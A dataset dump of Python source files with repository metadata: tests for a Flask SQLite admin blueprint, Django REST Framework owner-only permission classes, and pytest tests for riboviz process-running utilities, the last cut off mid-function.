| 0
| 0
| 0.009501
| 0.084783
| 460
| 6
| 131
| 76.666667
| 0.745843
| 0.936957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ebfd1c163c53ebe9cdcade12d7193d2ef35d015d
| 12,052
|
py
|
Python
|
flask_sqlite_admin/tests/core_test.py
|
twaldear/flask-sqlite-admin
|
6ff25881057b5b657b1cc868e1b00283086f110c
|
[
"MIT"
] | 6
|
2018-09-26T02:58:56.000Z
|
2020-07-21T14:55:39.000Z
|
flask_sqlite_admin/tests/core_test.py
|
twaldear/flask-sqlite-admin
|
6ff25881057b5b657b1cc868e1b00283086f110c
|
[
"MIT"
] | 2
|
2019-08-08T01:45:59.000Z
|
2019-09-21T16:54:32.000Z
|
flask_sqlite_admin/tests/core_test.py
|
twaldear/flask-sqlite-admin
|
6ff25881057b5b657b1cc868e1b00283086f110c
|
[
"MIT"
] | 5
|
2017-04-07T14:49:54.000Z
|
2020-09-16T09:38:08.000Z
|
import unittest
import os
import tempfile
from flask import Flask, make_response, redirect, url_for, request
from core import sqliteAdminBlueprint
import sqlite3
from functools import wraps
db_file = tempfile.mkstemp()
class flask_test_app:
""" basic app setup """
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
bpTest = sqliteAdminBlueprint(bpName = 'sqliteTest',dbPath=db_file[1])
app.register_blueprint(bpTest, url_prefix='/sqlite')
class testSQLiteBlueprint(unittest.TestCase):
""" test basic blueprint functionality """
def setUp(self):
self.db_fd, flask_test_app.app.config['DATABASE'] = db_file
flask_test_app.app.config['TESTING'] = True
self.app = flask_test_app.app.test_client()
self.con = sqlite3.connect(flask_test_app.app.config['DATABASE'])
self.con.execute('CREATE TABLE company( id integer PRIMARY KEY autoincrement, name TEXT NOT NULL, age integer NOT NULL, address CHAR(50), salary REAL );')
self.con.execute('CREATE TABLE department(dept CHAR(50) NOT NULL, emp_id INT NOT NULL );')
def tearDown(self):
os.unlink(flask_test_app.app.config['DATABASE'])
def test_index_page(self):
rv = self.app.get('/')
assert "hello world" in rv.data
def test_base_page(self):
rv = self.app.get('/sqlite/')
assert '<h1>sqlite Admin</h1>' in rv.data
def test_api_get_table(self):
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<input class="form-control state-add" name="name"></input>' in rv.data
assert '<input class="form-control state-add" name="salary"></input>' in rv.data
def test_api_get_invalid_table(self):
with self.assertRaises(Exception) as cm:
rv = self.app.get('/sqlite/api?table=test&sort=&dir=asc&offset=0')
self.assertEqual('invalid table `test`',str(cm.exception) )
def test_api_get_invalid_no_primary_key(self):
with self.assertRaises(Exception) as cm:
rv = self.app.get('/sqlite/api?table=department&sort=&dir=asc&offset=0')
self.assertEqual('No primary key for first column in table `department`',str(cm.exception) )
def test_api_add_row(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": "<a href="" class="alert-link">Refresh Page</a>"}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">testee mc test</span>' in rv.data
assert '<span class="state-rest">1469 Beverly Glen</span>' in rv.data
def test_api_add_row_invalid_table(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "test", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "invalid table `test`"}',rv.data.replace('\\',""))
def test_api_add_row_invalid_column(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "test": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "table company has no column named test"}',rv.data.replace('\\',""))
def test_api_add_row_invalid_no_primary_key(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "department", "dept": "dinosaurs", "emp_id": "23"})
self.assertEqual('{"status": 0, "error": "primaryKey"}',rv.data.replace('\\',""))
def test_api_edit_row(self):
self.test_api_add_row()
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": ""}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">1123 East Marlow Street' in rv.data
def test_api_edit_row_invalid_no_id(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "Request must include an id"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_table(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "test", "id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "invalid table `test`"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_column(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1", "test": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "no such column: test"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_no_primary_key(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "salary": "0"})
self.assertEqual('{"status": 0, "error": "primaryKey"}',rv.data.replace('\\',""))
def test_api_delete_row(self):
self.test_api_add_row()
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">1469 Beverly Glen' in rv.data
rv = self.app.post('/sqlite/api',data={"action": "delete", "table": "company","id":"1", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": "Row deleted"}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">1469 Beverly Glen' not in rv.data
def test_api_delete_row_invalid_table(self):
rv = self.app.post('/sqlite/api',data={"action": "delete", "table": "test", "id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "invalid table `test`"}',rv.data.replace('\\',""))
def test_api_edit_row_invalid_no_id(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "Request must include an id"}',rv.data.replace('\\',""))
def test_api_delete_row_invalid_no_primary_key(self):
rv = self.app.post('/sqlite/api',data={"action": "delete", "table": "company","id":"1", "address": "1123 East Marlow Street", "age": "23", "name": "testee mc test", "salary": "0"})
self.assertEqual('{"status": 0, "error": "primaryKey"}',rv.data.replace('\\',""))
class flask_test_app_extra_rules:
""" app setup with extra rules and a decorator """
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
def ruleTest1(self):
if 'name' in self.colData['name'] and self.value != 'Bob Barker':
raise ValueError('This is not Bob Barker!')
def ruleTest2(self):
if 'address' in self.colData['name'] and 'Beverly Glen' not in self.value:
raise ValueError('You cant live here!')
bpTest = sqliteAdminBlueprint(bpName = 'sqliteTest',dbPath=db_file[1],extraRules=[ruleTest1,ruleTest2])
app.register_blueprint(bpTest, url_prefix='/sqlite')
class testSQLiteBlueprintExtraRules(unittest.TestCase):
""" test blueprint when extra rules are passed """
def setUp(self):
self.db_fd, flask_test_app_extra_rules.app.config['DATABASE'] = db_file
flask_test_app_extra_rules.app.config['TESTING'] = True
self.app = flask_test_app_extra_rules.app.test_client()
self.con = sqlite3.connect(flask_test_app_extra_rules.app.config['DATABASE'])
self.con.execute('CREATE TABLE company( id integer PRIMARY KEY autoincrement, name TEXT NOT NULL, age integer NOT NULL, address CHAR(50), salary REAL );')
def tearDown(self):
os.unlink(flask_test_app_extra_rules.app.config['DATABASE'])
def test_index_page(self):
rv = self.app.get('/')
assert "hello world" in rv.data
def test_base_page(self):
rv = self.app.get('/sqlite/')
assert '<h1>sqlite Admin</h1>' in rv.data
def test_api_get_table(self):
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<input class="form-control state-add" name="name"></input>' in rv.data
assert '<input class="form-control state-add" name="salary"></input>' in rv.data
def test_api_add_row_pass(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "Bob Barker", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 1, "message": "<a href="" class="alert-link">Refresh Page</a>"}',rv.data.replace('\\',""))
rv = self.app.get('/sqlite/api?table=company&sort=&dir=asc&offset=0')
assert '<span class="state-rest">Bob Barker</span>' in rv.data
assert '<span class="state-rest">1469 Beverly Glen</span>' in rv.data
def test_api_add_row_fail_new_rule1(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "This is not Bob Barker!"}',rv.data.replace('\\',""))
def test_api_edit_row_fail_new_rule1(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1","address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "This is not Bob Barker!"}',rv.data.replace('\\',""))
def test_api_add_row_fail_new_rule2(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1221 Sacremento St", "age": "23", "name": "Bob Barker", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "You cant live here!"}',rv.data.replace('\\',""))
def test_api_edit_row_fail_new_rule2(self):
rv = self.app.post('/sqlite/api',data={"action": "edit", "table": "company","id":"1","address": "1221 Sacremento St", "age": "23", "name": "Bob Barker", "primaryKey": "id", "salary": "0"})
self.assertEqual('{"status": 0, "error": "You cant live here!"}',rv.data.replace('\\',""))
class flask_test_app_with_login_decorator:
""" app setup with a decorator that always redirects to login page """
app = Flask(__name__)
@app.route('/')
def index():
return "hello world"
@app.route('/login')
def login():
return "im a login page"
def decoratorTest(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 1==1:
return redirect(url_for('login', next=request.url))
return make_response(f(*args, **kwargs))
return decorated_function
bpTest = sqliteAdminBlueprint(bpName = 'sqliteTest',dbPath=db_file[1],decorator=decoratorTest)
app.register_blueprint(bpTest, url_prefix='/sqlite')
class testSQLiteBlueprintLoginDecorator(unittest.TestCase):
""" test blueprint when decorator is passed """
def setUp(self):
flask_test_app_with_login_decorator.app.config['TESTING'] = True
self.app = flask_test_app_with_login_decorator.app.test_client()
def test_index_page(self):
rv = self.app.get('/')
assert "hello world" in rv.data
def test_base_page_get(self):
rv = self.app.get('/sqlite/', follow_redirects=True)
assert 'im a login page' in rv.data
def test_base_page_post(self):
rv = self.app.post('/sqlite/api',data={"action": "add", "table": "company", "address": "1469 Beverly Glen", "age": "23", "name": "testee mc test", "primaryKey": "id", "salary": "0"}, follow_redirects=True)
assert 'im a login page' in rv.data
if __name__ == '__main__':
unittest.main()
| 49.191837
| 207
| 0.67159
| 1,754
| 12,052
| 4.482896
| 0.108894
| 0.032939
| 0.038916
| 0.041333
| 0.854127
| 0.830726
| 0.814829
| 0.789648
| 0.726313
| 0.702785
| 0
| 0.019819
| 0.12081
| 12,052
| 245
| 208
| 49.191837
| 0.722254
| 0.020246
| 0
| 0.445714
| 0
| 0.022857
| 0.387733
| 0.058619
| 0
| 0
| 0
| 0
| 0.228571
| 1
| 0.24
| false
| 0.005714
| 0.04
| 0.022857
| 0.388571
| 0.057143
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
233204c23d4470ea69c3ee9cdefd80a8920f0c93
| 1,370
|
py
|
Python
|
py_fitness/py_fitness/workout/permissions.py
|
audiolion/py-fitness
|
9e0ca785c73a07cb788685bbde6e840a7a2e3419
|
[
"MIT"
] | 1
|
2017-04-17T19:59:15.000Z
|
2017-04-17T19:59:15.000Z
|
py_fitness/py_fitness/workout/permissions.py
|
audiolion/py-fitness
|
9e0ca785c73a07cb788685bbde6e840a7a2e3419
|
[
"MIT"
] | 1
|
2016-12-09T01:58:46.000Z
|
2016-12-09T01:58:46.000Z
|
py_fitness/py_fitness/workout/permissions.py
|
audiolion/py-fitness
|
9e0ca785c73a07cb788685bbde6e840a7a2e3419
|
[
"MIT"
] | null | null | null |
from rest_framework import permissions
class WorkoutIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.author == request.user
class ExerciseIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.workout.author == request.user
class SetIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.exercise.workout.author == request.user
class UserIsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.workout.author == request.user
| 27.4
| 67
| 0.693431
| 161
| 1,370
| 5.819876
| 0.242236
| 0.106724
| 0.132337
| 0.175027
| 0.83031
| 0.794023
| 0.794023
| 0.794023
| 0.794023
| 0.794023
| 0
| 0
| 0.233577
| 1,370
| 49
| 68
| 27.959184
| 0.892381
| 0.186131
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.190476
| false
| 0
| 0.047619
| 0
| 0.809524
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88e3698ddd15e4eec956097054dfabf49c228508
| 142
|
py
|
Python
|
tests/__init__.py
|
Python-Tools/sserender
|
2a283e7e0c533f70dbb45d0adac35bb094723aac
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
Python-Tools/sserender
|
2a283e7e0c533f70dbb45d0adac35bb094723aac
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
Python-Tools/sserender
|
2a283e7e0c533f70dbb45d0adac35bb094723aac
|
[
"MIT"
] | null | null | null |
def setUpModule() -> None:
print("[Module sserender Test Start]")
def tearDownModule() -> None:
print("[Module sserender Test End]")
| 23.666667
| 42
| 0.669014
| 16
| 142
| 5.9375
| 0.625
| 0.189474
| 0.315789
| 0.505263
| 0.589474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176056
| 142
| 6
| 43
| 23.666667
| 0.811966
| 0
| 0
| 0
| 0
| 0
| 0.391608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
88efe5a40685f4a84b416f2757a2d89d34dbebdb
| 26,166
|
py
|
Python
|
riboviz/test/test_process_utils.py
|
rasilab/riboviz
|
a2ebaa7dac383e6ce0972626bf57fdba105d1780
|
[
"Apache-2.0"
] | 13
|
2020-10-20T13:03:11.000Z
|
2022-02-17T02:07:41.000Z
|
riboviz/test/test_process_utils.py
|
rasilab/riboviz
|
a2ebaa7dac383e6ce0972626bf57fdba105d1780
|
[
"Apache-2.0"
] | 306
|
2020-03-04T14:23:34.000Z
|
2022-02-26T14:51:02.000Z
|
riboviz/test/test_process_utils.py
|
rasilab/riboviz
|
a2ebaa7dac383e6ce0972626bf57fdba105d1780
|
[
"Apache-2.0"
] | 9
|
2020-04-26T20:27:02.000Z
|
2022-02-01T13:16:52.000Z
|
"""
:py:mod:`riboviz.process_utils` tests.
"""
import os.path
import tempfile
import pytest
from riboviz import process_utils
from riboviz import utils
@pytest.fixture(scope="function")
def tmp_stdout_file():
"""
Create a temporary file with a ``log`` suffix.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_stdout_file = tempfile.mkstemp(prefix="tmp_stdout", suffix=".log")
yield tmp_stdout_file
if os.path.exists(tmp_stdout_file):
os.remove(tmp_stdout_file)
@pytest.fixture(scope="function")
def tmp_stderr_file():
"""
Create a temporary file with a ``log`` suffix.
:return: path to temporary file
:rtype: str or unicode
"""
_, tmp_stderr_file = tempfile.mkstemp(prefix="tmp_stderr", suffix=".log")
yield tmp_stderr_file
if os.path.exists(tmp_stderr_file):
os.remove(tmp_stderr_file)
@pytest.fixture(scope="function")
def tmp_redirect_file():
"""
Create a temporary file with a ``txt`` suffix.
:return: file
:rtype: str or unicdo(dict, str or unicode)
"""
_, tmp_redirect_file = tempfile.mkstemp(prefix="tmp_redirect_",
suffix=".txt")
yield tmp_redirect_file
if os.path.exists(tmp_redirect_file):
os.remove(tmp_redirect_file)
@pytest.fixture(scope="function")
def tmp_cmd_file():
"""
Create a temporary file with a ``sh`` suffix.
:return: file
:rtype: str or unicdo(dict, str or unicode)
"""
_, tmp_cmd_file = tempfile.mkstemp(prefix="tmp_cmd_", suffix=".sh")
yield tmp_cmd_file
if os.path.exists(tmp_cmd_file):
os.remove(tmp_cmd_file)
def test_run_command_stdout_stderr():
"""
Test :py:func:`riboviz.process_utils.run_command` using standard
output and standard error.
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
try:
process_utils.run_command(cmd)
except AssertionError:
pass
def test_run_command_log_out_err(tmp_stdout_file, tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using files to
capture standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
with open(tmp_stdout_file, 'w') as out, \
open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_command(cmd, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == path # Output from ls
assert lines[1] == path # Output from ls
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
def test_run_command_log_out_error_one_file(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using a single
file to capture both standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
with open(tmp_stdout_file, "w") as out_err:
try:
process_utils.run_command(cmd, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
def test_run_command_log_out_err_alt(tmp_stdout_file, tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using files to
capture standard output and standard error. Different commands are
submitted to the operating system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd = ["wc", "-l", path, "no-such-file.txt", path]
with open(tmp_stdout_file, 'w') as out, \
open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_command(cmd, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[1] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[2] == "%5d total" % (num_lines * 2) # Output from wc
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"wc: no-such-file.txt: No such file or directory"
def test_run_command_log_out_error_one_file_alt(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_command` using a single
file to capture both standard output and standard error. Different
commands are submitted to the operating system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd = ["wc", "-l", path, "no-such-file.txt", path]
with open(tmp_stdout_file, "w") as out_err:
try:
process_utils.run_command(cmd, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 4
assert lines[0] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[1] == "wc: no-such-file.txt: No such file or directory"
assert lines[2] == "%5d %s" % (num_lines, path) # Output from wc
assert lines[3] == "%5d total" % (num_lines * 2) # Output from wc
def test_run_redirect_command_stdout(tmp_redirect_file):
"""
Test :py:func:`riboviz.process_utils.run_redirect_command` using
standard output.
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt"]
try:
process_utils.run_redirect_command(cmd, tmp_redirect_file)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
def test_run_redirect_command_tmp_stderr_file(tmp_redirect_file,
tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_redirect_command` using
a file to capture standard error.
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
with open(tmp_stderr_file, "w") as err:
try:
process_utils.run_redirect_command(cmd, tmp_redirect_file, err)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"cat: no-such-file.txt: No such file or directory"
def test_run_pipe_command_stdout_stderr():
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using
standard output and standard error.
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
try:
process_utils.run_pipe_command(cmd1, cmd2)
except AssertionError:
pass
def test_run_pipe_command_log_out_err(tmp_stdout_file, tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using files
to capture standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
with open(tmp_stdout_file, 'w') as out, open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 1
assert lines[0] == str(num_lines * 2) # Output from wc
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == "cat: no-such-file: No such file or directory"
def test_run_pipe_command_log_out_err_one_file(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using a
single file to capture both standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
with open(tmp_stdout_file, 'w') as out_err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == "cat: no-such-file: No such file or directory"
assert str(num_lines * 2) == lines[1] # Output from wc
def test_run_pipe_command_stdout_stderr_error():
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using
standard output and standard error, where the second command in
the pipeline includes an error.
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
try:
process_utils.run_pipe_command(cmd1, cmd2)
except AssertionError:
pass
def test_run_pipe_command_log_out_err_error(tmp_stdout_file,
tmp_stderr_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using files
to capture standard output and standard error, where the second
command in the pipeline includes an error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
with open(tmp_stdout_file, 'w') as out, open(tmp_stderr_file, 'w') as err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out, err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 0 # Expect output to be empty
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 3
assert lines[0] == "cat: no-such-file: No such file or directory"
assert lines[1] == "wc: invalid option -- 'x'"
assert lines[2] == "Try 'wc --help' for more information."
def test_run_pipe_command_log_out_err_one_file_error(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_pipe_command` using a
single file to capture both standard output and standard error,
where the second command in the pipeline includes an error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
with open(tmp_stdout_file, 'w') as out_err:
try:
process_utils.run_pipe_command(cmd1, cmd2, out_err, out_err)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == "cat: no-such-file: No such file or directory"
assert lines[1] == "wc: invalid option -- 'x'"
assert lines[2] == "Try 'wc --help' for more information."
def test_run_logged_command(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
try:
process_utils.run_logged_command(cmd, tmp_stdout_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
def test_run_logged_command_cmd_file(tmp_stdout_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error and
a file to capture commands sent to the operating system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
try:
process_utils.run_logged_command(cmd, tmp_stdout_file,
tmp_cmd_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == \
"ls: cannot access 'no-such-file.txt': No such file or directory" \
or lines[0] == \
"ls: cannot access no-such-file.txt: No such file or directory"
assert lines[1] == path # Output from ls
assert lines[2] == path # Output from ls
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
assert actual_cmds[0].rstrip('\n') == utils.list_to_str(cmd)
def test_run_logged_command_cmd_file_cmd_to_log(tmp_stdout_file,
tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_command` using a
single file to capture both standard output and standard error and
a file to capture commands sent to the operating system, where the
command to be logged differs from that submitted.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["ls", path, "no-such-file.txt", path]
cmd_to_log = ["ls", path, "'no-such-file.txt'", path]
